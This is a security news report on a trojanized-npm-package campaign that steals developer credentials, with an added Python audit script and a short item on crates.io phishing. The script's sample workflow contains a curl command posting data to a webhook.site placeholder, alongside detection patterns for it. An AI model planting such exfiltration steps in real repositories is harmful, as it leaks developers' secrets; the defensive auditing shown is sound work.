
Cybersecurity researchers have flagged a fresh software supply chain attack targeting the npm registry that affected more than 40 packages belonging to multiple maintainers.
“The compromised version includes a function (npmmodule.updatePackage) that downloads the package’s tarball, modifies the package, injects a local script (bundle.js), reissues the archive, republishes it, and enables automatic trojanization of downstream packages.”
The ultimate goal of the campaign is to use TruffleHog’s credential scanner to search developer machines for secrets and send them to an external server under the attacker’s control. The attack can target both Windows and Linux systems.

The following packages have been identified as affected by the incident:
angulartics2@14.1.2
@ctrl/deluge@7.2.2
@ctrl/golang-template@1.4.3
@ctrl/magnet-link@4.0.4
@ctrl/ngx-codemirror@7.0.2
@ctrl/ngx-csv@6.0.2
@ctrl/ngx-emoji-mart@9.2.2
@ctrl/ngx-rightclick@4.0.2
@ctrl/qbittorrent@9.7.2
@ctrl/react-adsense@2.0.2
@ctrl/shared-torrent@6.3.2
@ctrl/tinycolor@4.1.1, 4.1.2
@ctrl/torrent-file@4.1.2
@ctrl/ts-base32@4.0.2
encounter-playground@0.0.5
json-rules-engine-simplified@0.2.4, 0.2.1
koa2-swagger-ui@5.11.2, 5.11.1
@nativescript-community/gesturehandler@2.0.35
@nativescript-community/sentry@4.6.43
@nativescript-community/text@1.6.13
@nativescript-community/ui-collectionview@6.0.6
@nativescript-community/ui-drawer@0.1.30
@nativescript-community/ui-image@4.5.6
@nativescript-community/ui-material-bottomsheet@7.2.72
@nativescript-community/ui-material-core@7.2.76
@nativescript-community/ui-material-core-tabs@7.2.76
ngx-color@10.0.2
ngx-toastr@19.0.2
ngx-trend@8.0.1
react-complaint-image
react-jsonschema-form-extras@1.0.4
rxnt-authentication@0.0.6
rxnt-healthchecks-nestjs@1.0.5
rxnt-kue@1.0.7
swc-plugin-component-annotate@1.9.2
ts-gauss@3.0.6
The malicious JavaScript code injected into each of the trojanized packages (“bundle.js”) is designed to download and run TruffleHog, a legitimate secret-scanning tool, and use it to scan the host for tokens and cloud credentials such as GITHUB_TOKEN, NPM_TOKEN, AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.
“It validates the npm token against the whoami endpoint and interacts with the GitHub API when a token is available,” Socket says. “It also attempts to discover cloud metadata that can leak short-lived credentials inside cloud build agents.”
The script then abuses the developer’s credentials (i.e., a GitHub personal access token) to create a GitHub Actions workflow in .github/workflows and exfiltrates the collected data to a webhook[.]site endpoint.
Developers are advised to audit their environments and rotate npm tokens and other exposed secrets if they use any of the packages listed above.
“The workflows written into repositories persist beyond the original host,” the company says. “Once committed, future CI runs can trigger exfiltration steps from within a pipeline where sensitive secrets and artifacts are available by design.”
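The three indicators the article describes (a dependency pinned to a compromised name@version from the list above, a bundle.js dropped at the root of an installed package, and a committed workflow that posts to webhook[.]site) can be checked mechanically. The following is an added audit script, not code from the article, Socket or npm; the lockfile, file paths and workflow text it runs on are constructed samples, the COMPROMISED table is a partial transcription of the list above that a user would extend, and the webhook[.]site path in the sample workflow is a labelled placeholder.

```python
"""Audit a project for the npm compromise described above (added example).

Checks three indicators from the article:
  1. a dependency installed at a known-compromised name@version,
  2. a bundle.js file at the root of an installed package directory,
  3. a GitHub Actions workflow that references webhook.site.
"""
import os
import re

# Compromised name -> versions, transcribed (partially) from the article's list.
# Extend this table with the remaining entries before running it for real.
COMPROMISED = {
    "@ctrl/tinycolor": {"4.1.1", "4.1.2"},
    "@ctrl/deluge": {"7.2.2"},
    "ngx-toastr": {"19.0.2"},
    "koa2-swagger-ui": {"5.11.1", "5.11.2"},
    "json-rules-engine-simplified": {"0.2.1", "0.2.4"},
}


def _iter_installed(lock):
    """Yield (name, version) for every installed package in a package-lock.json.
    lockfileVersion 2/3: flat "packages" map keyed by node_modules path.
    lockfileVersion 1: nested "dependencies" tree, walked iteratively."""
    for path, meta in lock.get("packages", {}).items():
        if path:  # "" is the root project entry, not a dependency
            # nested installs look like node_modules/a/node_modules/@scope/b
            yield path.rsplit("node_modules/", 1)[-1], meta.get("version", "")
    if "packages" not in lock:
        stack = [lock.get("dependencies", {})]
        while stack:
            for name, meta in stack.pop().items():
                yield name, meta.get("version", "")
                stack.append(meta.get("dependencies", {}))


def find_compromised(lock):
    """Return (name, version) pairs in the lockfile that match COMPROMISED."""
    return [(n, v) for n, v in _iter_installed(lock) if v in COMPROMISED.get(n, ())]


# bundle.js directly under node_modules/<name>/ or node_modules/@scope/<name>/.
# A bundle.js deeper inside a package (dist/bundle.js) is a common legitimate
# build artifact, so it is deliberately not matched.
BUNDLE_RE = re.compile(r"^(?:.*/)?node_modules/((?:@[^/]+/)?[^/@]+)/bundle\.js$")


def suspicious_bundle_paths(paths):
    """Keep only the package-root bundle.js files from an iterable of paths."""
    return [p for p in paths if BUNDLE_RE.match(p)]


def list_files(node_modules_dir):
    """Collect relative file paths under a real node_modules directory."""
    parent = os.path.dirname(os.path.abspath(node_modules_dir))
    for root, _dirs, files in os.walk(node_modules_dir):
        for f in files:
            yield os.path.relpath(os.path.join(root, f), parent).replace(os.sep, "/")


WEBHOOK_RE = re.compile(r"webhook\.site", re.IGNORECASE)


def workflow_exfil_hits(workflow_text):
    """Return 1-based line numbers of a workflow file that mention webhook.site."""
    return [i for i, line in enumerate(workflow_text.splitlines(), 1) if WEBHOOK_RE.search(line)]


# ---- constructed sample inputs (not from any real project) ----
SAMPLE_LOCK = {
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/@ctrl/tinycolor": {"version": "4.1.2"},
        "node_modules/ngx-toastr": {"version": "18.0.0"},
        "node_modules/koa2-swagger-ui/node_modules/ngx-toastr": {"version": "19.0.2"},
    },
}
SAMPLE_FILES = [
    "node_modules/@ctrl/tinycolor/bundle.js",
    "node_modules/ngx-color/dist/bundle.js",
    "node_modules/a/node_modules/b/bundle.js",
]
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: curl -X POST https://webhook.site/PLACEHOLDER-ID -d "$DATA"
"""

if __name__ == "__main__":
    print("compromised deps:", find_compromised(SAMPLE_LOCK))
    print("package-root bundle.js:", suspicious_bundle_paths(SAMPLE_FILES))
    print("webhook.site lines:", workflow_exfil_hits(SAMPLE_WORKFLOW))
```

For a real project, load package-lock.json with json.load, feed list_files("node_modules") into suspicious_bundle_paths, and run workflow_exfil_hits over each file in .github/workflows; any hit is a reason to rotate the npm token, GitHub token and cloud keys the article names, not merely to delete the file.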
crates.io phishing campaign
The disclosure comes as the Rust Security Response Working Group warned of a phishing email campaign from the typosquatted domain rustfoundation[.]dev targeting crates.io users.

The message, sent from security@rustfoundation[.]dev, warns recipients of a suspected compromise of the crates.io infrastructure and instructs them to rotate their login credentials by clicking an embedded link to “make sure the attacker can’t change the package you’re publishing.”
The rogue link, github.rustfoundation[.]dev, mimics the GitHub login page, indicating a clear attempt by the attacker to harvest the victim’s credentials. The phishing page is currently inaccessible.
“These emails come from malicious domain names that are not controlled by the Rust Foundation or the Rust Project,” the group said. “There is no evidence of a compromise in the crates.io infrastructure.”
The Rust team also said that, in addition to taking down the phishing domain, it is taking steps to monitor crates.io for suspicious activity.